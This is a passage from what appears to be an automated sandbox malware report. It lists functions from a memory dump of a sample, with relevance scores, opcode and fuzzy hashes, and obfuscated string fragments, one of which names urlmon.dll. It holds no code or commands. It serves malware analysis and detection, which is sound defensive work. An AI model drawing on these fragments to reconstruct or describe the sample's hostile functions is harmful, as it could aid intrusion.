                                                                              • Instruction ID: e71d8aceb6ce50501603ca1bab01729d10a6c5492d94250dcdfcebd35a718f7a
                                                                              • Opcode Fuzzy Hash: a8016e67c6e1c2fc9a5179110924fe79c0e53355a7c2c8bfa5bbbd3094af2250
                                                                              • Instruction Fuzzy Hash: 93115B75A00309AFD710EB94DC45FAF73BDFB89700F008549F9195B280E771A911CBA5
                                                                              Function 035059BA Relevance: .1, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 984fd0d33f7d43a1328f1b26a07d77cabaf74aca2c823024ef09e57d3afde007
                                                                              • Instruction ID: 04248c629e93c22b7f5da81fa5c3c7994b6c2a013d7fd870fc711d551e3de252
                                                                              • Opcode Fuzzy Hash: 984fd0d33f7d43a1328f1b26a07d77cabaf74aca2c823024ef09e57d3afde007
                                                                              • Instruction Fuzzy Hash: 2A112EB6D0121CAF8B00DFE9D8409EEB7F9FF88210F14456AE919E7200E7715A048FA5
                                                                              Function 0350106A Relevance: .1, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 32cd9665e4834db33bde06419df748375f444485a820c74ddfbafe29bab9e60f
                                                                              • Instruction ID: 47361317c410178bf80f0e1d54e81c159dec32616ada9251810e74005cb0c30d
                                                                              • Opcode Fuzzy Hash: 32cd9665e4834db33bde06419df748375f444485a820c74ddfbafe29bab9e60f
                                                                              • Instruction Fuzzy Hash: 0801C0BBA003256BD714EA64EC45DEF737CEF94210F000791FD589B290FA62AE514AE1
                                                                              Function 034E331B Relevance: .0, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7df841c2058dc2cf581955712555486a86eeb5ced268ae1b5a9dedb97608f522
                                                                              • Instruction ID: bbeacd1edd06cb35473e4f1a8bd5e6075b4e98be91cb0f7e23d5f7c31399fdc7
                                                                              • Opcode Fuzzy Hash: 7df841c2058dc2cf581955712555486a86eeb5ced268ae1b5a9dedb97608f522
                                                                              • Instruction Fuzzy Hash: 2E11B7B1D21329AF8B44CFADD98459EBFF8FB09A20B14865BE818E7200D77186518F95
                                                                              Function 0350917A Relevance: .0, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction ID: ee58d1d9ad0f4d53dae12e4c7ca1d14bb7c71705ae596e800614e0e0f58322e9
                                                                              • Opcode Fuzzy Hash: d9af997e76cc9c93d5c50f47e23c34d344b85f94735d18940a576783256a0e6a
                                                                              • Instruction Fuzzy Hash: 3401C0B6201208BBCB44DF99DC91EDB77ADAF8C714F008108BA09E7241D630E951CBA4
                                                                              Function 03504CDA Relevance: .0, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4acc6142ab94d67d5182f619eb6c412269dd0fc57ad3bf4917a1fe766b80ee13
                                                                              • Instruction ID: 73f340be0a28e1542da589ddcb977f65ff5fb443af9256bfd16b67ee363c149b
                                                                              • Opcode Fuzzy Hash: 4acc6142ab94d67d5182f619eb6c412269dd0fc57ad3bf4917a1fe766b80ee13
                                                                              • Instruction Fuzzy Hash: EB01DBB6C11218AF8B44DFE9D9409EEBBF9BB08200F14466EE915F7200E7705A048FE5
                                                                              Function 034E347A Relevance: .0, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 333a5d48edeb85a31d7c6c6c41d95b2f3f12195e9ca38012c29292d3dcf91a15
                                                                              • Instruction ID: 1a9f092f0810e77e7cd6d740b5eb8da66cd189c36945ec6538f1cf588f1629e6
                                                                              • Opcode Fuzzy Hash: 333a5d48edeb85a31d7c6c6c41d95b2f3f12195e9ca38012c29292d3dcf91a15
                                                                              • Instruction Fuzzy Hash: EDF082776142166BD7119E5DEC40B86F79CEB84235F250223F9188F241E672D85186A4
                                                                              Function 034F7B53 Relevance: .0, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cea48c64d28e3fbced6741d0c587e77cb87b497505e44cf4b77fd680a0492c35
                                                                              • Instruction ID: b73fa270dcce44b0dcacf8b731cccc657d396931b048f4fd29e059b72de63c4b
                                                                              • Opcode Fuzzy Hash: cea48c64d28e3fbced6741d0c587e77cb87b497505e44cf4b77fd680a0492c35
                                                                              • Instruction Fuzzy Hash: 19F0F675D01309BEEB10EFA0DC48EABB738EFC4609F0041C9E8096A190E5354A89C759
                                                                              Function 035083CA Relevance: .0, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9876ff65cf99fbcb134ae5e6b24bdf36a331eb940c4678bf21c84af0e43dacc2
                                                                              • Instruction ID: c5d8b5ddc9a3e07e7d309ab540d0054919cc14cbdc75426d3220b2d56347813c
                                                                              • Opcode Fuzzy Hash: 9876ff65cf99fbcb134ae5e6b24bdf36a331eb940c4678bf21c84af0e43dacc2
                                                                              • Instruction Fuzzy Hash: 42F01CB5200249BFC710DE99DC81EDB77ADEFC9714F008409F918AB281D771B9118BB5
                                                                              Function 034F7ABA Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                              • Instruction ID: 40a8f09de37c6953a8d6552ef44792a3be99c627e598c0caeea1079e98d43637
                                                                              • Opcode Fuzzy Hash: 7b85b7b452bad1034da5be4d93268f30a6fbe58fe169f2f5b867a2ad2e5346f3
                                                                              • Instruction Fuzzy Hash: B0F08271C0520DEBDB14CFA4D841BEEBBB8EB04320F1483AAE9259B2C0E63597518785
                                                                              Function 0350909A Relevance: .0, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction ID: 80dd2627a143fb463fa77f9f026709b62a637bd4bc4809f52138a7cfff0c4a33
                                                                              • Opcode Fuzzy Hash: 9a88fbf9543032f2133e8a9cac2bb7711bd7b960dc0391e09488a6e464b12435
                                                                              • Instruction Fuzzy Hash: 55E06DB52083057FCA10EE59DC41EAB33ADEFC9715F004419F908AB241CB71B810C6B4
                                                                              Function 0350AEFA Relevance: .0, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3702d0d68fbf5931610e7ca1ac5024be2ca3cab5c8f530832197e6ae2b4eb132
                                                                              • Instruction ID: 679a01558ef4dabc0639019cd15a61ebe6bcd06f65bff093dfe9ca9e5132e734
                                                                              • Opcode Fuzzy Hash: 3702d0d68fbf5931610e7ca1ac5024be2ca3cab5c8f530832197e6ae2b4eb132
                                                                              • Instruction Fuzzy Hash: 20E04F7BA1132437C6349699AC05FA7B76DDFC1A60F090165FE089B294E576B90142E4
                                                                              Function 03508D7A Relevance: .0, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: e83096fa8d37c81d20b3f50cade02517e4e41ab5b9b2950546515eecd1c8dbbc
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: 4AE04F75200214BBC220EA5ADC40EAB776CEFC6714F108419FA096B281C771B911C7B0
                                                                              Function 034E3479 Relevance: .0, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b27746691c9559bf58dae695fde518ee3984b34b56c81d7783ddd682c46e26cc
                                                                              • Instruction ID: 6c67af10ca6a0dde32e6ec09c198b9b64e7aa8500fe5e0c6d30f912e7a3ece8d
                                                                              • Opcode Fuzzy Hash: b27746691c9559bf58dae695fde518ee3984b34b56c81d7783ddd682c46e26cc
                                                                              • Instruction Fuzzy Hash: 60E02B37C001165F87268F5D9C40886F7D9EA852323250323FC7C5F350EA32C81287E4

                                                                              Non-executed Functions

                                                                              Function 0350226A Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                              • API String ID: 0-1002149817
                                                                              • Opcode ID: 03244abc8ce9e1aebff136a057a4279e0e5a879d85df3ffd8e9be4170e0638bd
                                                                              • Instruction ID: d72706cfaca4516775e57aa6ae33e7dd9db3542c21994257f4e2f46798378d7e
                                                                              • Opcode Fuzzy Hash: 03244abc8ce9e1aebff136a057a4279e0e5a879d85df3ffd8e9be4170e0638bd
                                                                              • Instruction Fuzzy Hash: 30C15DB1D00328AEDF21DFA5DC44BEEBBB8BF44304F008199E548AB251E7B54A88CF55
                                                                              Function 034FF16A Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                              • API String ID: 0-3236418099
                                                                              • Opcode ID: 265071c797844de1bcc0d0666b89079ab4c39dc39828662541171f0a425cfd09
                                                                              • Instruction ID: ae2f80ef8d40267a62a8bdb1b8b862cb7e32d031e4a3d4731eb073eb18ed87ab
                                                                              • Opcode Fuzzy Hash: 265071c797844de1bcc0d0666b89079ab4c39dc39828662541171f0a425cfd09
                                                                              • Instruction Fuzzy Hash: 8F9142B5D00318AEDB11DFA59C40FEF77B9FF44704F0441A9E608AA140EB765B898F65
                                                                              Function 034E3160 Relevance: 17.5, Strings: 14, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %218$%8>3$/xfn$/xfnyg$24<8$;;6x$W$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                              • API String ID: 0-3957564025
                                                                              • Opcode ID: adda903286deb506cdeccb828e8c2f85f70a56724f4a2f5114387996e53bd572
                                                                              • Instruction ID: f399beda6f95d1c3d71dbad6fd7282f96c08316816be1205bfeed0afba4c6825
                                                                              • Opcode Fuzzy Hash: adda903286deb506cdeccb828e8c2f85f70a56724f4a2f5114387996e53bd572
                                                                              • Instruction Fuzzy Hash: 90111EB5C11348ABCB00CF9AE982ADEFB34BF04640F608658D910AB345D3715A51CF9A
                                                                              Function 034E316A Relevance: 17.5, Strings: 14, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %218$%8>3$/xfn$/xfnyg$24<8$;;6x$W$bygw$effe$lw%!$mfny$wcye$xegf$yg
                                                                              • API String ID: 0-3957564025
                                                                              • Opcode ID: 99447c72995f882ccb870f3e4ca4111a3bc7a134e3b062d86f02d1ef9103d67b
                                                                              • Instruction ID: 98f5b41b48eee0426371e27de84711659a6b0ffdd1c6df89a1a35954ef072cd6
                                                                              • Opcode Fuzzy Hash: 99447c72995f882ccb870f3e4ca4111a3bc7a134e3b062d86f02d1ef9103d67b
                                                                              • Instruction Fuzzy Hash: 0A112CB9C01348ABCB00CF99E982ADEBB34BB04200F208658E510AB344D3315A51CF9A
                                                                              Function 034FA94A Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                              • API String ID: 0-392141074
                                                                              • Opcode ID: f2f1e4cb305dfab93f6b93e7819e70f7c201f35f02a6b34cd8f40868bd6f79da
                                                                              • Instruction ID: 194bf92ca286499dfd16a313dcda48659600b0ba3b7caf8af83a11b7e2dd6837
                                                                              • Opcode Fuzzy Hash: f2f1e4cb305dfab93f6b93e7819e70f7c201f35f02a6b34cd8f40868bd6f79da
                                                                              • Instruction Fuzzy Hash: 8C716FB6C10318AADB21DF94CC80FEEB77DBF44701F044199E609BA290EB715B888F65
                                                                              Function 034FA943 Relevance: 16.4, Strings: 13, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                              • API String ID: 0-392141074
                                                                              • Opcode ID: 59a89d32df108772029dd2bb67342b1921bcab205790106484014aa060a0a457
                                                                              • Instruction ID: 918283f78916a1d4f10506a632f9d02be34bc6dd79b62f187ac4bb217a518c1e
                                                                              • Opcode Fuzzy Hash: 59a89d32df108772029dd2bb67342b1921bcab205790106484014aa060a0a457
                                                                              • Instruction Fuzzy Hash: B0615FB6C10318AADB51DF94CC80FEEB779BF48701F044199E609BA290EB715B888F65
                                                                              Function 034EE60A Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              • Opcode ID: fb05a056f920949269e8bedfccc33ff092b4d6c5b7a076c497d5969fe2930c68
                                                                              • Instruction ID: da34d8c8a44d6cdbf344837afa1fffb65d9de51454ab5db0ee490ca2cf4fc2cc
                                                                              • Opcode Fuzzy Hash: fb05a056f920949269e8bedfccc33ff092b4d6c5b7a076c497d5969fe2930c68
                                                                              • Instruction Fuzzy Hash: C2218EB5D50318AAEF50DF90DC84BEEBBB9BF44704F04815DE608BB280DBB516488FA4
                                                                              Function 034EE601 Relevance: 13.8, Strings: 11, Instructions: 83COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                              • API String ID: 0-685823316
                                                                              • Opcode ID: c74da9975499e4d17991f5db6ff83a443c4ac83ca6894ac6896736266d72c38b
                                                                              • Instruction ID: fdfbe1d4cb3ef66a68230ec5485dc0a78fae17e1e75efe652090ac512f41e46a
                                                                              • Opcode Fuzzy Hash: c74da9975499e4d17991f5db6ff83a443c4ac83ca6894ac6896736266d72c38b
                                                                              • Instruction Fuzzy Hash: 12317FB5C50318AAEF00DF90DC85BEEBBB9BF44704F04815CE608BB280DBB516488FA4
                                                                              Function 034FF62A Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :$:$:$A$I$N$P$m$s$t
                                                                              • API String ID: 0-2304485323
                                                                              • Opcode ID: 9bb889a91a0b3b70a2abf0fad235c1f9b51deb1a3c3c4d7f3a0a745550bf32b6
                                                                              • Instruction ID: b5355cedc43ed649753e253e7d01d6f0c4d5a93afabd84594887db3dfd8dee4b
                                                                              • Opcode Fuzzy Hash: 9bb889a91a0b3b70a2abf0fad235c1f9b51deb1a3c3c4d7f3a0a745550bf32b6
                                                                              • Instruction Fuzzy Hash: F9D109B6900309AFDB54DFA4CC84FEFB7B9BF48300F04461DE609AA250E779E9058B65
                                                                              Function 034F5AA6 Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                              • API String ID: 0-620024284
                                                                              • Opcode ID: 4c80b45163797c10a5ef4beb887f62e73569342c3b2f3aa256fb4c0f604d8b45
                                                                              • Instruction ID: 7f181c379d59259b4e0ebee976987cba598f54d04c474c189b64b5dd8fb55c1e
                                                                              • Opcode Fuzzy Hash: 4c80b45163797c10a5ef4beb887f62e73569342c3b2f3aa256fb4c0f604d8b45
                                                                              • Instruction Fuzzy Hash: 5441A576C00318BADB25EBA0DC44FEF777DAF54300F00869DA5096B190EAB59B488FA5
                                                                              Function 034F5AAA Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                              • API String ID: 0-620024284
                                                                              • Opcode ID: ab5d629185bbab4edfc213e7b99f7e3507ad0cbfa81b349d44cf65b216d5e3c0
                                                                              • Instruction ID: ce5110ff58f0591a5a49ca9bd0d318d0c262299317851c92929218c9a99ebf7b
                                                                              • Opcode Fuzzy Hash: ab5d629185bbab4edfc213e7b99f7e3507ad0cbfa81b349d44cf65b216d5e3c0
                                                                              • Instruction Fuzzy Hash: E841A776D00318BADB25EFA0DC44FEF777DAF54300F00859DA5096B190EAB59B488FA1
                                                                              Function 034FA71A Relevance: 8.9, Strings: 7, Instructions: 171COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$HR8|$P$T$f$r$x
                                                                              • API String ID: 0-2916646499
                                                                              • Opcode ID: f5f78b1c584b12c558bcaacb2bf6234061bda860125efb9e312233ae0b1119c2
                                                                              • Instruction ID: 11cb96039bbb1d99096a0fe65ba26a91d654fe1d1061f593ef83db4285711364
                                                                              • Opcode Fuzzy Hash: f5f78b1c584b12c558bcaacb2bf6234061bda860125efb9e312233ae0b1119c2
                                                                              • Instruction Fuzzy Hash: 9E51A271900306AEDB34DFA5D844BABB3B8FF44740F08862EE5495E290D7B5A584CF55
                                                                              Function 03502ACA Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: L$S$\$a$c$e$l
                                                                              • API String ID: 0-3322591375
                                                                              • Opcode ID: fe684f4c31507d28ecaa303fdce768f42d30d70bec57fc8ee08a292f89cc7962
                                                                              • Instruction ID: 7f0ff7b411e92e0e3ec12df113f9252c2358da06a807ec647a1744672f4c9c28
                                                                              • Opcode Fuzzy Hash: fe684f4c31507d28ecaa303fdce768f42d30d70bec57fc8ee08a292f89cc7962
                                                                              • Instruction Fuzzy Hash: 52418676D0431CAACB10DFA4EC84BEFB7F8FF88310F05456AD909A7150E7725A458B94
                                                                              Function 034E6BEA Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $)$1$W$i$u$z
                                                                              • API String ID: 0-2316511558
                                                                              • Opcode ID: 4edcac02a01baa5cf0a7e4ba7c599d9050a93b92e9fd13d9b44771d6a7d107af
                                                                              • Instruction ID: cc26d3143786bdd63f58da8b1c74b97405322705d871113e849b811441b16095
                                                                              • Opcode Fuzzy Hash: 4edcac02a01baa5cf0a7e4ba7c599d9050a93b92e9fd13d9b44771d6a7d107af
                                                                              • Instruction Fuzzy Hash: 3911DE10D087CEDDDB12C7BD88086AEBF715F23224F0883C9D8F52A2D2C2794206D7A6
                                                                              Function 034FA715 Relevance: 8.8, Strings: 7, Instructions: 39COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_3340000_QmkRHPDwxbW.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: F$HR8|$P$T$f$r$x
                                                                              • API String ID: 0-2916646499
                                                                              • Opcode ID: ca416abfa789e6e718c1fb3c9d77ebc6f38de6baccba64517ca7c07b6918875c
                                                                              • Instruction ID: 11e654c6c5a8084145dae9cdde3e1fd059a5f90345393f7624bfd73fb294b67c
                                                                              • Opcode Fuzzy Hash: ca416abfa789e6e718c1fb3c9d77ebc6f38de6baccba64517ca7c07b6918875c
                                                                              • Instruction Fuzzy Hash: 2C018F70C00318ABDF20DFA588486AEBBB9FF45354F008159D8183F240E7B69A498B95
                                                                              Function 034F998A Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.3754837830.0000000003340000.00000040.00000001.00040000.00000000.sdmp, Offset: 03340000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
